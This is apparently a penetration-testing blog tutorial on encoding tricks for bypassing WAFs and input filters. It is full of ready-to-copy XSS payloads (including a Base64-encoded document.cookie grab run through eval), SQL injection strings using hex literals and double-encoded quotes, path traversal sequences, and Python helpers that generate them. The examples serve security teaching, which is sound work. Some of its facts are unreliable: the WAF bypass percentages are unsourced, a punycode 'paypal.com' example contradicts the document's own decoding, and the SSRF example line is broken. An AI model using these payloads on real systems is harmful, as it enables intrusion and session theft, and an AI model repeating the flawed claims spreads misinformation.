Encoding is one of the most important concepts in web security testing. Understanding how different encoding schemes work — and how applications decode them — lets you bypass input filters, WAFs, and sanitization routines. This guide covers every major encoding technique with practical examples for penetration testing.

Why Encoding Matters in Security Testing

Encoding Bypass Effectiveness vs Common WAFs (%)

URL Encoding (%XX): 52%
Double URL Encoding (%25XX): 71%
HTML Entity Encoding: 65%
Unicode (\uXXXX): 58%
Base64 (with eval): 44%
Hex (0x + hex): 48%
Mixed Case: 39%
Null byte injection: 33%

Encoding Techniques Cheat Sheet

Encoding	Tool	Bypass Context	WAFs Affected	Example
URL encoding	Burp Decoder	URL parameters	ModSecurity	%3Cscript%3E for <script>
Double URL	Burp / manual	Double-decoded apps	Nginx-based WAFs	%253Cscript%253E
HTML entity	Manual	HTML contexts	Signature-based	&lt;script&gt; for <script>
Unicode escape	Manual / CyberChef	JSON/JS contexts	Regex-based

Every layer of a web application may decode input differently. A WAF might decode URL encoding once before matching signatures, while the backend application decodes twice. This disparity creates bypass opportunities: encode your payload in a way the WAF doesn't decode, but the application does.

The Encoding Pipeline lets you chain multiple encoding layers and preview how each stage transforms your payload — essential for complex multi-layer bypass attempts.

URL Encoding

URL encoding replaces unsafe characters with %HH hex notation. Single encoding is standard; double encoding exploits applications that decode twice.

# Single URL encoding
<script>  →  %3Cscript%3E
/etc/passwd  →  %2Fetc%2Fpasswd
' (single quote)  →  %27
SPACE  →  %20 (or + in form-encoded query strings)

# Double URL encoding — bypass WAFs that decode once
%3Cscript%3E  →  %253Cscript%253E
%27  →  %2527

# Selective encoding — encode just the dangerous chars
<script>alert(1)</script>  →  %3Cscript>alert(1)%3C/script>
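
As a rough illustration, the transformations listed above can be reproduced with Python's standard urllib.parse module. The helper names (single_encode, double_encode, selective_encode) and the default set of "dangerous" characters are assumptions made for this sketch, not part of any tool mentioned in this article.

```python
from urllib.parse import quote, quote_plus


def single_encode(payload: str) -> str:
    """Percent-encode every reserved character (nothing is treated as safe)."""
    return quote(payload, safe="")


def double_encode(payload: str) -> str:
    """Encode twice, so each '%' from the first pass becomes '%25'."""
    return quote(single_encode(payload), safe="")


def selective_encode(payload: str, dangerous: str = "<") -> str:
    """Hypothetical helper: encode only the characters listed in `dangerous`."""
    return "".join(quote(ch, safe="") if ch in dangerous else ch for ch in payload)


print(single_encode("<script>"))      # %3Cscript%3E
print(single_encode("/etc/passwd"))   # %2Fetc%2Fpasswd
print(quote_plus("a b"))              # a+b (form-style space encoding)
print(double_encode("<script>"))      # %253Cscript%253E
print(selective_encode("<script>alert(1)</script>"))  # %3Cscript>alert(1)%3C/script>
```

Passing safe="" matters here: by default quote() leaves "/" unencoded, which would not match the /etc/passwd example.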

The %25 Trick

Encode the percent sign itself (% → %25) to produce double-encoded sequences:

%25  →  %  (after one decode)
%2527  →  %27 (after first decode)  →  ' (after second decode)

# Exploit: WAF sees %2527 (no dangerous chars), app decodes to '
?id=1%2527 AND 1=1--
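
The decode mismatch can be modeled in a few lines of Python. This is only a toy sketch: waf_allows and app_value are hypothetical stand-ins for a WAF that URL-decodes once and a backend that decodes twice, and the quote check is a deliberately simplistic signature.

```python
from urllib.parse import unquote


def waf_allows(raw_value: str) -> bool:
    """Toy WAF (assumption): URL-decode once, then block on a literal quote."""
    return "'" not in unquote(raw_value)


def app_value(raw_value: str) -> str:
    """Toy backend (assumption): URL-decode twice before using the value."""
    return unquote(unquote(raw_value))


raw = "1%2527 AND 1=1--"
print(unquote(raw))      # 1%27 AND 1=1--  (what the toy WAF inspects)
print(waf_allows(raw))   # True
print(app_value(raw))    # 1' AND 1=1--    (what the toy backend uses)
```

A single-encoded %27 is caught by the same toy WAF, which is why the second layer is what makes the difference in this model.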

HTML Entity Encoding

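HTML entity encoding converts characters to their named or numeric character references. The browser's HTML parser decodes these references in text and attribute values before the value of an attribute such as onerror is handed to the JavaScript engine, so entities placed inside an attribute value can bypass filters that look for literal characters:

# Named entities
<  →  &lt;     (&LT; is also defined, but entity names are generally case-sensitive)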
>  →  &gt;
"  →  &quot;
'  →  &apos; or &#39;
&  →  &amp;

# Decimal numeric entities
<  →  &#60;
>  →  &#62;
"  →  &#34;

# Hex numeric entities
<  →  &#x3C; or &#x3c; (case insensitive)
s  →  &#x73;

# XSS bypass using entities in event handlers
<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>
# Browser decodes &#x61; to 'a', &#x6C; to 'l', etc → alert(1)
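
To check what a reference sequence decodes to without opening a browser, Python's html module can serve as an approximation of the parser's decoding step. The helper to_hex_entities is a hypothetical name introduced for this sketch.

```python
import html


def to_hex_entities(text: str) -> str:
    """Hypothetical helper: turn each character into a hex numeric reference."""
    return "".join(f"&#x{ord(ch):X};" for ch in text)


encoded = to_hex_entities("alert")
print(encoded)                            # &#x61;&#x6C;&#x65;&#x72;&#x74;

# html.unescape mirrors the decoding applied to an attribute value
print(html.unescape(f"{encoded}(1)"))     # alert(1)

# Named, decimal, and hex references all decode to the same character
print(html.unescape("&lt;&#60;&#x3c;"))   # <<<
```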

Base64 in JavaScript

Base64 is used to obfuscate payloads in JavaScript contexts. The browser provides atob() (Base64 decode) and btoa() (Base64 encode) natively:

# Encode a payload
btoa("alert(document.cookie)")
# Returns: "YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="

# Execute via eval
eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))

# DOM XSS via Base64
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>

# In data URIs (many current browsers block top-level navigation to data: links, so verify in the target browser)
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>
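
When preparing payloads outside the browser, the same Base64 strings can be generated with Python's base64 module. The wrapper functions below are illustrative names assumed for this sketch; they only build strings and do not execute anything.

```python
import base64


def b64(payload: str) -> str:
    """Base64-encode a UTF-8 string, matching btoa() for ASCII input."""
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


def eval_atob_wrapper(js: str) -> str:
    """Hypothetical helper: wrap JavaScript source in eval(atob('...'))."""
    return f"eval(atob('{b64(js)}'))"


def html_data_uri(markup: str) -> str:
    """Hypothetical helper: build a Base64 text/html data URI."""
    return f"data:text/html;base64,{b64(markup)}"


print(b64("alert(document.cookie)"))   # YWxlcnQoZG9jdW1lbnQuY29va2llKQ==
print(eval_atob_wrapper("alert(1)"))   # eval(atob('YWxlcnQoMSk='))
print(html_data_uri("<script>alert(1)</script>"))
# data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
```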

Unicode Normalization Attacks

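Unicode normalization converts "equivalent" characters to a canonical form. Applications that normalize after filtering can be bypassed with characters that only turn into the filtered ones once normalized. Compatibility normalization (NFKC/NFKD) is the form that folds lookalikes such as fullwidth characters to ASCII; NFC and NFD leave them unchanged:

# Fullwidth ASCII variants (U+FF01–U+FF5E)
＜script＞alert(1)＜/script＞
# ＜ = U+FF1C (FULLWIDTH LESS-THAN SIGN)
# After NFKC normalization in some frameworks: <script>alert(1)</script>

# Path traversal via lenient decoding and normalization
..%c0%af  →  ../  (overlong UTF-8 encoding, accepted only by non-strict decoders)
..%ef%bc%8f  →  ../  (fullwidth solidus U+FF0F, after NFKC normalization)

# Case mapping and compatibility folding
ſ (U+017F, Latin Small Letter Long S) becomes 's' under NFKC and 'S' when uppercased
ᴀ (U+1D00, Latin Letter Small Capital A) is only a visual lookalike: it has no Unicode decomposition, so it maps to 'a' only through custom confusable tables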
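
Python's unicodedata module makes it easy to check which normalization form actually folds a given character. The sketch below assumes a toy filter (naive_filter, a hypothetical name) that runs before normalization; it suggests that compatibility normalization (NFKC), not NFC, is what converts fullwidth characters to ASCII.

```python
import unicodedata


def naive_filter(value: str) -> bool:
    """Toy filter (assumption): accept anything without an ASCII '<'."""
    return "<" not in value


def strict_utf8_rejects(data: bytes) -> bool:
    """Return True if a strict UTF-8 decoder refuses the byte sequence."""
    try:
        data.decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


payload = "\uff1cscript\uff1ealert(1)\uff1c/script\uff1e"  # fullwidth < and >

print(naive_filter(payload))                             # True: filter sees no '<'
print(unicodedata.normalize("NFC", payload) == payload)  # True: NFC changes nothing
print(unicodedata.normalize("NFKC", payload))            # <script>alert(1)</script>

solidus = bytes.fromhex("efbc8f").decode("utf-8")        # U+FF0F from %ef%bc%8f
print(unicodedata.normalize("NFKC", solidus))            # /
print(strict_utf8_rejects(b"\xc0\xaf"))                  # True: overlong form is invalid

print(unicodedata.normalize("NFKC", "\u017f"))           # s
print("\u017f".upper())                                  # S
print(unicodedata.normalize("NFKC", "\u1d00") == "\u1d00")  # True: no folding to 'a'
```

The overlong sequence only matters against decoders that skip validation, so it is worth confirming the target's behavior rather than assuming it.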

Punycode for Domain Bypass

Punycode encodes internationalized domain names (IDN) into ASCII. This is exploitable for URL allow-list bypass and phishing:

# Punycode encoding
xn--e1awd7f.com  (encodes to a Cyrillic lookalike of "paypal.com")
xn--pple-43d.com  (lookalike of "apple.com")

# In SSRF filters that allow-list based on domain suffix
http://[email protected]/  (parser confusion)
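
The label conversions can be checked with Python's built-in punycode codec. The function names below are assumptions for this sketch, and it handles a single label only; a full IDNA implementation also applies mapping and validation rules that are skipped here.

```python
def to_ace_label(label: str) -> str:
    """Encode one domain label to its ASCII-compatible 'xn--' form."""
    return "xn--" + label.encode("punycode").decode("ascii")


def from_ace_label(label: str) -> str:
    """Decode an 'xn--' label back to its Unicode form."""
    return label[len("xn--"):].encode("ascii").decode("punycode")


mixed = "\u0430pple"  # Cyrillic а (U+0430) followed by Latin "pple"
print(to_ace_label(mixed))  # xn--pple-43d

decoded = from_ace_label("xn--e1awd7f")
# Print code points, because the decoded label is visually close to Latin "epic"
print([f"U+{ord(ch):04X}" for ch in decoded])
# ['U+0435', 'U+0440', 'U+0456', 'U+0441']
```

Printing code points rather than the string itself is a deliberate choice: the rendered text is exactly what a homograph is designed to make misleading.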

Hex Encoding

# MySQL hex encoding for SQLi filter bypass
SELECT 0x61646d696e  # decodes to "admin"
WHERE username=0x61646d696e

# In SQLi payloads — bypass quote filters
' UNION SELECT 0x61646d696e,0x70617373776f7264--
# Equivalent to: UNION SELECT 'admin','password'

# Hex in URLs (same as URL encoding)
%61 = a, %62 = b ... %7A = z
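
Generating the hex literals by hand is error-prone, so a small helper is convenient. This is a minimal sketch; mysql_hex_literal and decode_hex_literal are hypothetical names, and the output is just the 0x-prefixed hex of the UTF-8 bytes.

```python
def mysql_hex_literal(text: str) -> str:
    """Return the 0x... literal for the UTF-8 bytes of `text`."""
    return "0x" + text.encode("utf-8").hex()


def decode_hex_literal(literal: str) -> str:
    """Reverse of mysql_hex_literal, for checking a payload by eye."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


print(mysql_hex_literal("admin"))               # 0x61646d696e
print(mysql_hex_literal("password"))            # 0x70617373776f7264
print(decode_hex_literal("0x61646d696e"))       # admin
```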

Multi-Layer Encoding Chains

Chaining encoding layers exploits differential decoding between security controls and application logic:

# Layer 1: HTML encode the XSS payload
<script>alert(1)</script>
→ &lt;script&gt;alert(1)&lt;/script&gt;

# Layer 2: URL encode the HTML entities
→ %26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B

# Scenario: WAF checks URL-decoded value (sees HTML entities — no script tag)
# Application HTML-decodes the entities, revealing <script> tags
# Result: WAF bypassed, XSS executed
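
The two-layer chain above can be built and unwound with the Python standard library. The sketch assumes the same scenario as the text: a control that URL-decodes once and looks for a literal script tag, and an application that then HTML-decodes the value. build_chain is a hypothetical helper name.

```python
import html
from urllib.parse import quote, unquote


def build_chain(payload: str) -> tuple[str, str]:
    """Layer 1: HTML-encode. Layer 2: URL-encode the result."""
    layer1 = html.escape(payload, quote=False)
    # Parentheses are kept literal to match the example in the text
    layer2 = quote(layer1, safe="()")
    return layer1, layer2


layer1, layer2 = build_chain("<script>alert(1)</script>")
print(layer1)  # &lt;script&gt;alert(1)&lt;/script&gt;
print(layer2)  # %26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B

waf_view = unquote(layer2)            # what a URL-decoding control inspects
app_view = html.unescape(waf_view)    # what an HTML-decoding application ends up with
print("<script" in waf_view)          # False
print(app_view)                       # <script>alert(1)</script>
```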

Build and test these chains in the Encoding Pipeline — it supports stacking URL, HTML, Base64, hex, and Unicode transforms with a live preview of each layer's output.

Encoding for Different Contexts

The correct encoding depends entirely on where the payload lands:

URL parameter context: URL-encode special characters. Double-encode if the WAF decodes only once.
HTML attribute context: HTML entity encoding. A literal " breaks out of a double-quoted attribute; the encoded form &quot; does so only if the application decodes entities before writing the value into the page.
JavaScript string context: JavaScript Unicode escapes such as \u003cscript\u003e, or hex escapes such as \x3cscript\x3e.
JSON string context: Unicode escapes are decoded by JSON parsers, for example \u0022 for a double quote.
CSS context: CSS hex escapes, for example \003C for <.
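
The per-context escapes listed above can be generated programmatically. The helpers below are a sketch with assumed names; js_unicode_escape and css_escape as written only cover characters in the Basic Multilingual Plane, and js_hex_escape only code points up to U+00FF.

```python
import json


def js_unicode_escape(ch: str) -> str:
    """JavaScript/JSON \\uXXXX escape for a single BMP character."""
    return f"\\u{ord(ch):04x}"


def js_hex_escape(ch: str) -> str:
    """JavaScript \\xXX escape (not valid in JSON) for code points <= 0xFF."""
    return f"\\x{ord(ch):02x}"


def css_escape(ch: str) -> str:
    """CSS backslash escape with four hex digits."""
    return f"\\{ord(ch):04X}"


print(js_unicode_escape("<") + "script" + js_unicode_escape(">"))  # \u003cscript\u003e
print(js_hex_escape("<") + "script" + js_hex_escape(">"))          # \x3cscript\x3e
print(css_escape("<"))                                             # \003C

# A JSON parser decodes the Unicode escape back to the literal character
print(json.loads('"' + js_unicode_escape('"') + '"'))              # "
```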

The WAF Evasion Studio tests encoding bypass strategies automatically against common WAF signature sets, and the XSS Cheat Sheet has context-specific encoded payloads ready to copy.

Payload Encoding Techniques: URL, HTML, Base64, and Unicode for WAF Bypass

September 22, 2025 · 11 min read

Encoding, WAF Bypass, XSS, Penetration Testing
